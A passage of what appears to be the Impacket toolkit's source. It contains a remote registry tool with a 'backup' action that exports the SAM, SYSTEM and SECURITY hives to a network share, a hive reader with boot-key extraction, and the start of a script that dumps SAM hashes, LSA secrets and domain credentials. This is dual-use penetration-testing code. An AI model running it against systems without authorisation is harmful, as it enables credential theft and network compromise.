self.__username = username\n self.__password = password\n self.__domain = domain\n self.__options = options\n self.__action = options.action.upper()\n self.__lmhash = ''\n self.__nthash = ''\n self.__aesKey = options.aesKey\n self.__doKerberos = options.k\n self.__kdcHost = options.dc_ip\n self.__smbConnection = None\n self.__remoteOps = None\n\n # It's possible that this is defined somewhere, but I couldn't find where\n self.__regValues = {0: 'REG_NONE', 1: 'REG_SZ', 2: 'REG_EXPAND_SZ', 3: 'REG_BINARY', 4: 'REG_DWORD',\n 5: 'REG_DWORD_BIG_ENDIAN', 6: 'REG_LINK', 7: 'REG_MULTI_SZ', 11: 'REG_QWORD'}\n\n if options.hashes is not None:\n self.__lmhash, self.__nthash = options.hashes.split(':')\n\n def connect(self, remoteName, remoteHost):\n self.__smbConnection = SMBConnection(remoteName, remoteHost, sess_port=int(self.__options.port))\n\n if self.__doKerberos:\n self.__smbConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash,\n self.__nthash, self.__aesKey, self.__kdcHost)\n else:\n self.__smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)\n\n def run(self, remoteName, remoteHost):\n self.connect(remoteName, remoteHost)\n self.__remoteOps = RemoteOperations(self.__smbConnection, self.__doKerberos, self.__kdcHost)\n\n try:\n self.__remoteOps.enableRegistry()\n except Exception as e:\n logging.debug(str(e))\n logging.warning('Cannot check RemoteRegistry status. Triggering start trough named pipe...')\n self.triggerWinReg()\n self.__remoteOps.connectWinReg()\n\n try:\n dce = self.__remoteOps.getRRP()\n\n if self.__action == 'QUERY':\n self.query(dce, self.__options.keyName)\n elif self.__action == 'ADD':\n self.add(dce, self.__options.keyName, self.__options.persistent)\n elif self.__action == 'DELETE':\n self.delete(dce, self.__options.keyName)\n elif self.__action == 'SAVE':\n self.save(dce, self.__options.keyName)\n elif self.__action == 'BACKUP':\n for hive in [\"HKLM\\\\SAM\", \"HKLM\\\\SYSTEM\", \"HKLM\\\\SECURITY\"]:\n self.save(dce, hive)\n else:\n logging.error('Method %s not implemented yet!' % self.__action)\n except (Exception, KeyboardInterrupt) as e:\n #import traceback\n #traceback.print_exc()\n logging.critical(str(e))\n finally:\n if self.__remoteOps:\n self.__remoteOps.finish()\n\n def triggerWinReg(self):\n # original idea from https://twitter.com/splinter_code/status/1715876413474025704\n tid = self.__smbConnection.connectTree('IPC$')\n try:\n self.__smbConnection.openFile(tid, r'\\winreg', 0x12019f, creationOption=0x40, fileAttributes=0x80)\n except SessionError:\n # STATUS_PIPE_NOT_AVAILABLE error is expected\n pass\n # give remote registry time to start\n time.sleep(1)\n\n def save(self, dce, keyName):\n hRootKey, subKey = self.__strip_root_key(dce, keyName)\n outputFileName = \"%s\\\\%s.save\" % (self.__options.outputPath, subKey)\n logging.debug(\"Dumping %s, be patient it can take a while for large hives (e.g. HKLM\\\\SYSTEM)\" % keyName)\n try:\n ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey, dwOptions=rrp.REG_OPTION_BACKUP_RESTORE | rrp.REG_OPTION_OPEN_LINK, samDesired=rrp.KEY_READ)\n rrp.hBaseRegSaveKey(dce, ans2['phkResult'], outputFileName)\n logging.info(\"Saved %s to %s\" % (keyName, outputFileName))\n except Exception as e:\n logging.error(\"Couldn't save %s: %s\" % (keyName, e))\n\n def query(self, dce, keyName):\n hRootKey, subKey = self.__strip_root_key(dce, keyName)\n\n ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey,\n samDesired=rrp.MAXIMUM_ALLOWED | rrp.KEY_ENUMERATE_SUB_KEYS | rrp.KEY_QUERY_VALUE)\n\n if self.__options.v:\n print(keyName)\n value = rrp.hBaseRegQueryValue(dce, ans2['phkResult'], self.__options.v)\n print('\\t' + self.__options.v + '\\t' + self.__regValues.get(value[0], 'KEY_NOT_FOUND') + '\\t', str(value[1]))\n elif self.__options.ve:\n print(keyName)\n value = rrp.hBaseRegQueryValue(dce, ans2['phkResult'], '')\n print('\\t' + '(Default)' + '\\t' + self.__regValues.get(value[0], 'KEY_NOT_FOUND') + '\\t', str(value[1]))\n elif self.__options.s:\n self.__print_all_subkeys_and_entries(dce, subKey + '\\\\', ans2['phkResult'], 0)\n else:\n print(keyName)\n self.__print_key_values(dce, ans2['phkResult'])\n i = 0\n while True:\n try:\n key = rrp.hBaseRegEnumKey(dce, ans2['phkResult'], i)\n print(keyName + '\\\\' + key['lpNameOut'][:-1])\n i += 1\n except Exception:\n break\n # ans5 = rrp.hBaseRegGetVersion(rpc, ans2['phkResult'])\n # ans3 = rrp.hBaseRegEnumKey(rpc, ans2['phkResult'], 0)\n\n def add(self, dce, keyName, persistent):\n hRootKey, subKey = self.__strip_root_key(dce, keyName)\n\n\n # READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY should be equal to KEY_WRITE (0x20006)\n if self.__options.v is None: # Try to create subkey\n subKeyCreate = subKey\n subKey = '\\\\'.join(subKey.split('\\\\')[:-1])\n\n ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey,\n samDesired=READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY)\n\n # Should I use ans2?\n\n # Convert persistant flag into the relevant dwOption.\n # dwOption 0 = Persistent\n # dwOption 1 = Volatile\n dwOption = 0x00000001\n if persistent is True:\n dwOption = 0x00000000\n else:\n print('[!] The created key is volatile and will not remain after a reboot. ')\n\n ans3 = rrp.hBaseRegCreateKey(\n dce, hRootKey, subKeyCreate, dwOptions=dwOption,\n samDesired=READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY)\n\n if ans3['ErrorCode'] == 0:\n print('Successfully set subkey %s' % (\n keyName\n ))\n else:\n print('Error 0x%08x while creating subkey %s' % (\n ans3['ErrorCode'], keyName\n ))\n\n else: # Try to set value of key\n ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey,\n samDesired=READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY)\n\n\n dwType = getattr(rrp, self.__options.vt, None)\n\n if dwType is None or not self.__options.vt.startswith('REG_'):\n raise Exception('Error parsing value type %s' % self.__options.vt)\n\n #Fix (?) for packValue function\n if dwType == rrp.REG_MULTI_SZ:\n vd = '\\0'.join(self.__options.vd)\n valueData = vd + 2 * '\\0' # REG_MULTI_SZ ends with 2 null-bytes\n valueDataToPrint = vd.replace('\\0', '\\n\\t\\t')\n else:\n vd = self.__options.vd[0] if len(self.__options.vd) > 0 else ''\n if dwType in (\n rrp.REG_DWORD, rrp.REG_DWORD_BIG_ENDIAN, rrp.REG_DWORD_LITTLE_ENDIAN,\n rrp.REG_QWORD, rrp.REG_QWORD_LITTLE_ENDIAN\n ):\n valueData = int(vd)\n elif dwType == rrp.REG_BINARY:\n bin_value_len = len(vd)\n bin_value_len += (bin_value_len & 1)\n valueData = binascii.a2b_hex(vd.ljust(bin_value_len, '0'))\n else:\n valueData = vd + \"\\0\" # Add a NULL Byte as terminator for Non Binary values\n valueDataToPrint = valueData\n\n ans3 = rrp.hBaseRegSetValue(\n dce, ans2['phkResult'], self.__options.v, dwType, valueData\n )\n\n if ans3['ErrorCode'] == 0:\n print('Successfully set\\n\\tkey\\t%s\\\\%s\\n\\ttype\\t%s\\n\\tvalue\\t%s' % (\n keyName, self.__options.v, self.__options.vt, valueDataToPrint\n ))\n else:\n print('Error 0x%08x while setting\\n\\tkey\\t%s\\\\%s\\n\\ttype\\t%s\\n\\tvalue\\t%s' % (\n ans3['ErrorCode'], keyName, self.__options.v, self.__options.vt, valueDataToPrint\n ))\n\n def delete(self, dce, keyName):\n hRootKey, subKey = self.__strip_root_key(dce, keyName)\n\n # READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY should be equal to KEY_WRITE (0x20006)\n if self.__options.v is None and not self.__options.va and not self.__options.ve: # Try to delete subkey\n subKeyDelete = subKey\n subKey = '\\\\'.join(subKey.split('\\\\')[:-1])\n\n ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey,\n samDesired=READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY)\n\n # Should I use ans2?\n try:\n ans3 = rrp.hBaseRegDeleteKey(\n dce, hRootKey, subKeyDelete,\n )\n except rpcrt.DCERPCException as e:\n if e.error_code == 5:\n #TODO: Check if DCERPCException appears only because of existing subkeys\n print('Cannot delete key %s. Possibly it contains subkeys or insufficient privileges' % keyName)\n return\n else:\n raise\n except Exception as e:\n logging.error('Unhandled exception while hBaseRegDeleteKey')\n return\n\n if ans3['ErrorCode'] == 0:\n print('Successfully deleted subkey %s' % (\n keyName\n ))\n else:\n print('Error 0x%08x while deleting subkey %s' % (\n ans3['ErrorCode'], keyName\n ))\n\n elif self.__options.v: # Delete single value\n ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey,\n samDesired=READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY)\n\n ans3 = rrp.hBaseRegDeleteValue(\n dce, ans2['phkResult'], self.__options.v\n )\n\n if ans3['ErrorCode'] == 0:\n print('Successfully deleted key %s\\\\%s' % (\n keyName, self.__options.v\n ))\n else:\n print('Error 0x%08x while deleting key %s\\\\%s' % (\n ans3['ErrorCode'], keyName, self.__options.v\n ))\n\n elif self.__options.ve:\n ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey,\n samDesired=READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY)\n\n ans3 = rrp.hBaseRegDeleteValue(\n dce, ans2['phkResult'], ''\n )\n\n if ans3['ErrorCode'] == 0:\n print('Successfully deleted value %s\\\\%s' % (\n keyName, 'Default'\n ))\n else:\n print('Error 0x%08x while deleting value %s\\\\%s' % (\n ans3['ErrorCode'], keyName, self.__options.v\n ))\n\n elif self.__options.va:\n ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey,\n samDesired=rrp.MAXIMUM_ALLOWED | rrp.KEY_ENUMERATE_SUB_KEYS)\n i = 0\n allSubKeys = []\n while True:\n try:\n ans3 = rrp.hBaseRegEnumValue(dce, ans2['phkResult'], i)\n lp_value_name = ans3['lpValueNameOut'][:-1]\n allSubKeys.append(lp_value_name)\n i += 1\n except rrp.DCERPCSessionError as e:\n if e.get_error_code() == ERROR_NO_MORE_ITEMS:\n break\n\n ans4 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey,\n samDesired=rrp.MAXIMUM_ALLOWED | rrp.KEY_ENUMERATE_SUB_KEYS)\n for subKey in allSubKeys:\n try:\n ans5 = rrp.hBaseRegDeleteValue(\n dce, ans4['phkResult'], subKey\n )\n if ans5['ErrorCode'] == 0:\n print('Successfully deleted value %s\\\\%s' % (\n keyName, subKey\n ))\n else:\n print('Error 0x%08x in deletion of value %s\\\\%s' % (\n ans5['ErrorCode'], keyName, subKey\n ))\n except Exception as e:\n print('Unhandled error %s in deletion of value %s\\\\%s' % (\n str(e), keyName, subKey\n ))\n\n def __strip_root_key(self, dce, keyName):\n # Let's strip the root key\n try:\n rootKey = keyName.split('\\\\')[0]\n subKey = '\\\\'.join(keyName.split('\\\\')[1:])\n except Exception:\n raise Exception('Error parsing keyName %s' % keyName)\n if rootKey.upper() == 'HKLM':\n ans = rrp.hOpenLocalMachine(dce)\n elif rootKey.upper() == 'HKCU':\n ans = rrp.hOpenCurrentUser(dce)\n elif rootKey.upper() == 'HKU':\n ans = rrp.hOpenUsers(dce)\n elif rootKey.upper() == 'HKCR':\n ans = rrp.hOpenClassesRoot(dce)\n else:\n raise Exception('Invalid root key %s ' % rootKey)\n hRootKey = ans['phKey']\n return hRootKey, subKey\n\n def __print_key_values(self, rpc, keyHandler):\n i = 0\n while True:\n try:\n ans4 = rrp.hBaseRegEnumValue(rpc, keyHandler, i)\n lp_value_name = ans4['lpValueNameOut'][:-1]\n if len(lp_value_name) == 0:\n lp_value_name = '(Default)'\n lp_type = ans4['lpType']\n lp_data = b''.join(ans4['lpData'])\n print('\\t' + lp_value_name + '\\t' + self.__regValues.get(lp_type, 'KEY_NOT_FOUND') + '\\t', end=' ')\n self.__parse_lp_data(lp_type, lp_data)\n i += 1\n except rrp.DCERPCSessionError as e:\n if e.get_error_code() == ERROR_NO_MORE_ITEMS:\n break\n\n def __print_all_subkeys_and_entries(self, rpc, keyName, keyHandler, index):\n index = 0\n while True:\n try:\n subkey = rrp.hBaseRegEnumKey(rpc, keyHandler, index)\n index += 1\n ans = rrp.hBaseRegOpenKey(rpc, keyHandler, subkey['lpNameOut'],\n samDesired=rrp.MAXIMUM_ALLOWED | rrp.KEY_ENUMERATE_SUB_KEYS)\n newKeyName = keyName + subkey['lpNameOut'][:-1] + '\\\\'\n print(newKeyName)\n self.__print_key_values(rpc, ans['phkResult'])\n self.__print_all_subkeys_and_entries(rpc, newKeyName, ans['phkResult'], 0)\n except rrp.DCERPCSessionError as e:\n if e.get_error_code() == ERROR_NO_MORE_ITEMS:\n break\n except rpcrt.DCERPCException as e:\n if str(e).find('access_denied') >= 0:\n logging.error('Cannot access subkey %s, bypassing it' % subkey['lpNameOut'][:-1])\n continue\n elif str(e).find('rpc_x_bad_stub_data') >= 0:\n logging.error('Fault call, cannot retrieve value for %s, bypassing it' % subkey['lpNameOut'][:-1])\n return\n raise\n\n @staticmethod\n def __parse_lp_data(valueType, valueData):\n try:\n if valueType == rrp.REG_SZ or valueType == rrp.REG_EXPAND_SZ:\n if type(valueData) is int:\n print('NULL')\n else:\n print(\"%s\" % (valueData.decode('utf-16le')[:-1]))\n elif valueType == rrp.REG_BINARY:\n print('')\n hexdump(valueData, '\\t')\n elif valueType == rrp.REG_DWORD:\n print(\"0x%x\" % (unpack(' 1:\n print('')\n hexdump(valueData, '\\t')\n else:\n print(\" NULL\")\n except:\n print(\" NULL\")\n elif valueType == rrp.REG_MULTI_SZ:\n print(\"%s\" % (valueData.decode('utf-16le')[:-2]))\n else:\n print(\"Unknown Type 0x%x!\" % valueType)\n hexdump(valueData)\n except Exception as e:\n logging.debug('Exception thrown when printing reg value %s' % str(e))\n print('Invalid data')\n pass\n\n\nif __name__ == '__main__':\n\n # Explicitly changing the stdout encoding format\n if sys.stdout.encoding is None:\n # Output is redirected to a file\n sys.stdout = codecs.getwriter('utf8')(sys.stdout)\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help=True, description=\"Windows Register manipulation script.\")\n\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n subparsers = parser.add_subparsers(help='actions', dest='action')\n\n # A query command\n query_parser = subparsers.add_parser('query', help='Returns a list of the next tier of subkeys and entries that '\n 'are located under a specified subkey in the registry.')\n query_parser.add_argument('-keyName', action='store', required=True,\n help='Specifies the full path of the subkey. The '\n 'keyName must include a valid root key. Valid root keys for the local computer are: HKLM,'\n ' HKU, HKCU, HKCR.')\n query_parser.add_argument('-v', action='store', metavar=\"VALUENAME\", required=False, help='Specifies the registry '\n 'value name that is to be queried. If omitted, all value names for keyName are returned. ')\n query_parser.add_argument('-ve', action='store_true', default=False, required=False, help='Queries for the default '\n 'value or empty value name')\n query_parser.add_argument('-s', action='store_true', default=False, help='Specifies to query all subkeys and value '\n 'names recursively.')\n\n # An add command\n add_parser = subparsers.add_parser('add', help='Adds a new subkey or entry to the registry')\n add_parser.add_argument('-keyName', action='store', required=True,\n help='Specifies the full path of the subkey. The '\n 'keyName must include a valid root key. Valid root keys for the local computer are: HKLM,'\n ' HKU, HKCU, HKCR.')\n add_parser.add_argument('-v', action='store', metavar=\"VALUENAME\", required=False, help='Specifies the registry '\n 'value name that is to be set. Set to \"\" to write the (Default) value')\n add_parser.add_argument('-vt', action='store', metavar=\"VALUETYPE\", required=False, help='Specifies the registry '\n 'type name that is to be set. Default is REG_SZ. Valid types are: REG_NONE, REG_SZ, REG_EXPAND_SZ, '\n 'REG_BINARY, REG_DWORD, REG_DWORD_BIG_ENDIAN, REG_LINK, REG_MULTI_SZ, REG_QWORD',\n default='REG_SZ')\n add_parser.add_argument('-vd', action='append', metavar=\"VALUEDATA\", required=False, help='Specifies the registry '\n 'value data that is to be set. In case of adding a REG_MULTI_SZ value, set this option once for each '\n 'line you want to add.', default=[])\n add_parser.add_argument('--persistent', action='store_true', required=False, help='Specify that the created key is intended to be persistent '\n 'through reboot. Default is volatile key creation')\n\n # An delete command\n delete_parser = subparsers.add_parser('delete', help='Deletes a subkey or entries from the registry')\n delete_parser.add_argument('-keyName', action='store', required=True,\n help='Specifies the full path of the subkey. The '\n 'keyName must include a valid root key. Valid root keys for the local computer are: HKLM,'\n ' HKU, HKCU, HKCR.')\n delete_parser.add_argument('-v', action='store', metavar=\"VALUENAME\", required=False, help='Specifies the registry '\n 'value name that is to be deleted.')\n delete_parser.add_argument('-va', action='store_true', required=False, help='Delete all values under this key.')\n delete_parser.add_argument('-ve', action='store_true', required=False, help='Delete the value of empty value name (Default).')\n\n # A copy command\n # copy_parser = subparsers.add_parser('copy', help='Copies a registry entry to a specified location in the remote '\n # 'computer')\n\n #A save command\n save_parser = subparsers.add_parser('save', help='Saves a copy of specified subkeys, entries, and values of the '\n 'registry in a specified file.')\n save_parser.add_argument('-keyName', action='store', required=True,\n help='Specifies the full path of the subkey. The '\n 'keyName must include a valid root key. Valid root keys for the local computer are: HKLM,'\n ' HKU, HKCU, HKCR.')\n save_parser.add_argument('-o', dest='outputPath', action='store', metavar='\\\\\\\\192.168.0.2\\\\share', required=True, help='Output UNC path the target system must export the registry saves to')\n\n # A special backup command to save HKLM\\SAM, HKLM\\SYSTEM and HKLM\\SECURITY\n backup_parser = subparsers.add_parser('backup', help='(special command) Backs up HKLM\\\\SAM, HKLM\\\\SYSTEM and HKLM\\\\SECURITY to a specified file.')\n backup_parser.add_argument('-o', dest='outputPath', action='store', metavar='\\\\\\\\192.168.0.2\\\\share', required=True,\n help='Output UNC path the target system must export the registry saves to')\n\n # A load command\n # load_parser = subparsers.add_parser('load', help='Writes saved subkeys and entries back to a different subkey in '\n # 'the registry.')\n\n # An unload command\n # unload_parser = subparsers.add_parser('unload', help='Removes a section of the registry that was loaded using the '\n # 'reg load operation.')\n\n # A compare command\n # compare_parser = subparsers.add_parser('compare', help='Compares specified registry subkeys or entries')\n\n # A export command\n # status_parser = subparsers.add_parser('export', help='Creates a copy of specified subkeys, entries, and values into'\n # 'a file')\n\n # A import command\n # import_parser = subparsers.add_parser('import', help='Copies a file containing exported registry subkeys, entries, '\n # 'and values into the remote computer\\'s registry')\n\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar=\"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\",\n help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on '\n 'target parameters. If valid credentials cannot be found, it will use the ones specified '\n 'in the command line')\n group.add_argument('-aesKey', action=\"store\", metavar=\"hex key\",\n help='AES key to use for Kerberos Authentication (128 or 256 bits)')\n\n group = parser.add_argument_group('connection')\n\n group.add_argument('-dc-ip', action='store', metavar=\"ip address\",\n help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in '\n 'the target parameter')\n group.add_argument('-target-ip', action='store', metavar=\"ip address\",\n help='IP Address of the target machine. If omitted it will use whatever was specified as target. '\n 'This is useful when target is the NetBIOS name and you cannot resolve it')\n group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar=\"destination port\",\n help='Destination port to connect to SMB Server')\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n domain, username, password, remoteName = parse_target(options.target)\n\n if options.target_ip is None:\n options.target_ip = remoteName\n\n if domain is None:\n domain = ''\n\n if options.aesKey is not None:\n options.k = True\n\n if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n from getpass import getpass\n\n password = getpass(\"Password:\")\n\n regHandler = RegHandler(username, password, domain, options)\n try:\n regHandler.run(remoteName, options.target_ip)\n except Exception as e:\n #import traceback\n #traceback.print_exc()\n logging.error(str(e))\n" }, { "path": "examples/registry-read.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# A Windows Registry Reader Example\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n# Reference for:\n# winregistry.py\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport sys\nimport argparse\nimport ntpath\nfrom binascii import unhexlify, hexlify\n\nfrom impacket.examples import logger\nfrom impacket import version\nfrom impacket import winregistry\n\n\ndef bootKey(reg):\n baseClass = 'ControlSet001\\\\Control\\\\Lsa\\\\'\n keys = ['JD','Skew1','GBG','Data']\n tmpKey = ''\n\n for key in keys:\n tmpKey = tmpKey + unhexlify(reg.getClass(baseClass + key).decode('utf-16le')[:8])\n\n transforms = [ 8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7 ]\n\n syskey = ''\n for i in range(len(tmpKey)):\n syskey += tmpKey[transforms[i]]\n\n print(hexlify(syskey))\n\ndef getClass(reg, className):\n regKey = ntpath.dirname(className)\n regClass = ntpath.basename(className)\n\n value = reg.getClass(className)\n\n if value is None:\n return\n\n print(\"[%s]\" % regKey)\n\n print(\"Value for Class %s: \\n\" % regClass, end=' ')\n\n winregistry.hexdump(value,' ')\n\ndef getValue(reg, keyValue):\n regKey = ntpath.dirname(keyValue)\n regValue = ntpath.basename(keyValue)\n\n value = reg.getValue(keyValue)\n\n print(\"[%s]\\n\" % regKey)\n\n if value is None:\n return\n\n print(\"Value for %s:\\n \" % regValue, end=' ')\n reg.printValue(value[0],value[1])\n\ndef enumValues(reg, searchKey):\n key = reg.findKey(searchKey)\n\n if key is None:\n return\n\n print(\"[%s]\\n\" % searchKey)\n\n values = reg.enumValues(key)\n print(values)\n\n for value in values:\n print(\" %-30s: \" % value, end=' ')\n data = reg.getValue(searchKey, value.decode('utf-8'))\n # Special case for binary string.. so it looks better formatted\n if data[0] == winregistry.REG_BINARY:\n print('')\n reg.printValue(data[0],data[1])\n print('')\n else:\n reg.printValue(data[0],data[1])\n\ndef enumKey(reg, searchKey, isRecursive, indent=' '):\n parentKey = reg.findKey(searchKey)\n\n if parentKey is None:\n return\n\n keys = reg.enumKey(parentKey)\n\n for key in keys:\n print(\"%s%s\" %(indent, key))\n if isRecursive is True:\n if searchKey == '\\\\':\n enumKey(reg, '\\\\%s'%key,isRecursive,indent+' ')\n else:\n enumKey(reg, '%s\\\\%s'%(searchKey,key),isRecursive,indent+' ')\n\ndef walk(reg, keyName):\n return reg.walk(keyName)\n\n\ndef main():\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help = True, description = \"Reads data from registry hives.\")\n\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('hive', action='store', help='registry hive to open')\n subparsers = parser.add_subparsers(help='actions', dest='action')\n # A enum_key command\n enumkey_parser = subparsers.add_parser('enum_key', help='enumerates the subkeys of the specified open registry key')\n enumkey_parser.add_argument('-name', action='store', required=True, help='registry key')\n enumkey_parser.add_argument('-recursive', dest='recursive', action='store_true', required=False, help='recursive search (default False)')\n\n # A enum_values command\n enumvalues_parser = subparsers.add_parser('enum_values', help='enumerates the values for the specified open registry key')\n enumvalues_parser.add_argument('-name', action='store', required=True, help='registry key')\n\n # A get_value command\n getvalue_parser = subparsers.add_parser('get_value', help='retrieves the data for the specified registry value')\n getvalue_parser.add_argument('-name', action='store', required=True, help='registry value')\n\n # A get_class command\n getclass_parser = subparsers.add_parser('get_class', help='retrieves the data for the specified registry class')\n getclass_parser.add_argument('-name', action='store', required=True, help='registry class name')\n\n # A walk command\n walk_parser = subparsers.add_parser('walk', help='walks the registry from the name node down')\n walk_parser.add_argument('-name', action='store', required=True, help='registry class name to start walking down from')\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n reg = winregistry.get_registry_parser(options.hive)\n\n if options.action.upper() == 'ENUM_KEY':\n print(\"[%s]\" % options.name)\n enumKey(reg, options.name, options.recursive)\n elif options.action.upper() == 'ENUM_VALUES':\n enumValues(reg, options.name)\n elif options.action.upper() == 'GET_VALUE':\n getValue(reg, options.name)\n elif options.action.upper() == 'GET_CLASS':\n getClass(reg, options.name)\n elif options.action.upper() == 'WALK':\n walk(reg, options.name)\n\n reg.close()\n\nif __name__ == \"__main__\":\n main()\n" }, { "path": "examples/regsecrets.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright (C) 2022 Fortra. All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Performs various techniques to dump hashes from the\n# remote machine without executing any agent there.\n# For SAM and LSA Secrets (including cached creds)\n# we try to read as much as we can from the registry\n# and then we save the hives in the target system\n# (%SYSTEMROOT%\\\\Temp dir) and read the rest of the\n# data from there.\n# For NTDS.dit we either:\n# a. Get the domain users list and get its hashes\n# and Kerberos keys using [MS-DRDS] DRSGetNCChanges()\n# call, replicating just the attributes we need.\n# b. Extract NTDS.dit via vssadmin executed with the\n# smbexec approach.\n# It's copied on the temp dir and parsed remotely.\n#\n# The script initiates the services required for its working\n# if they are not available (e.g. Remote Registry, even if it is\n# disabled). After the work is done, things are restored to the\n# original state.\n#\n# Authors:\n# Alberto Solino (@agsolino)\n# Julien Egloff (@laxaa)\n#\n# References:\n# Most of the work done by these guys. I just put all\n# the pieces together, plus some extra magic.\n#\n# - https://github.com/gentilkiwi/kekeo/tree/master/dcsync\n# - https://moyix.blogspot.com.ar/2008/02/syskey-and-sam.html\n# - https://moyix.blogspot.com.ar/2008/02/decrypting-lsa-secrets.html\n# - https://moyix.blogspot.com.ar/2008/02/cached-domain-credentials.html\n# - https://web.archive.org/web/20130901115208/www.quarkslab.com/en-blog+read+13\n# - https://code.google.com/p/creddump/\n# - https://lab.mediaservice.net/code/cachedump.rb\n# - https://insecurety.net/?p=768\n# - https://web.archive.org/web/20190717124313/http://www.beginningtoseethelight.org/ntsecurity/index.htm\n# - https://www.exploit-db.com/docs/english/18244-active-domain-offline-hash-dump-&-forensic-analysis.pdf\n# - https://www.passcape.com/index.php?section=blog&cmd=details&id=15\n#\n\nimport argparse\nimport codecs\nimport logging\nimport sys\n\nfrom impacket import version\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target\nfrom impacket.smbconnection import SMBConnection\nfrom impacket.examples.regsecrets import LSASecrets, RemoteOperations, SAMHashes\n\nfrom impacket.krb5.keytab import Keytab\nfrom binascii import unhexlify, hexlify\n\nclass DumpSecrets:\n def __init__(self, remoteName, username='', password='', domain='', options=None):\n self.__remoteName = remoteName\n self.__remoteHost = options.target_ip\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__lmhash = ''\n self.__nthash = ''\n self.__outputFileName = options.outputfile\n self.__aesKey = options.aesKey\n self.__smbConnection = None\n self.__remoteOps = None\n self.__SAMHashes = None\n self.__LSASecrets = None\n self.__bootkey = options.bootkey\n self.__doKerberos = options.k\n self.__history = options.history\n self.__kdcHost = options.dc_ip\n self.__nosam = options.nosam\n self.__nocache = options.nocache\n self.__nolsa = options.nolsa\n self.__throttle = options.throttle\n\n if options.hashes is not None:\n self.__lmhash, self.__nthash = options.hashes.split(':')\n\n def connect(self):\n self.__smbConnection = SMBConnection(self.__remoteName, self.__remoteHost)\n if self.__doKerberos:\n self.__smbConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash,\n self.__nthash, self.__aesKey, self.__kdcHost)\n else:\n self.__smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)\n\n def dump(self):\n try:\n bootKey = None\n try:\n self.connect()\n self.__remoteOps = RemoteOperations(self.__smbConnection, self.__doKerberos, self.__kdcHost)\n self.__remoteOps.enableRegistry()\n except Exception as e:\n logging.error('RemoteOperations failed: %s' % str(e))\n if not self.__bootkey:\n try:\n bootKey = self.__remoteOps.getBootKey()\n except Exception as e:\n logging.error('RemoteOperations failed: %s' % str(e))\n else:\n if self.__bootkey.startswith('0x'):\n self.__bootkey = self.__bootkey[2:]\n bootKey = unhexlify(self.__bootkey)\n logging.info('Target system bootKey: 0x%s' % hexlify(bootKey).decode('utf-8'))\n\n if bootKey is None:\n raise Exception('Failed to fetch bootKey')\n\n if not self.__nosam:\n try:\n self.__SAMHashes = SAMHashes(bootKey, remoteOps=self.__remoteOps, history=self.__history, throttle=self.__throttle)\n self.__SAMHashes.dump()\n if self.__outputFileName is not None:\n self.__SAMHashes.export(self.__outputFileName)\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error('SAM hashes extraction failed: %s' % str(e))\n\n try:\n self.__LSASecrets = LSASecrets(bootKey, self.__remoteOps,\n history=self.__history, throttle=self.__throttle)\n if not self.__nocache:\n self.__LSASecrets.dumpCachedHashes()\n if self.__outputFileName is not None:\n self.__LSASecrets.exportCached(self.__outputFileName)\n if not self.__nolsa:\n self.__LSASecrets.dumpSecrets()\n if 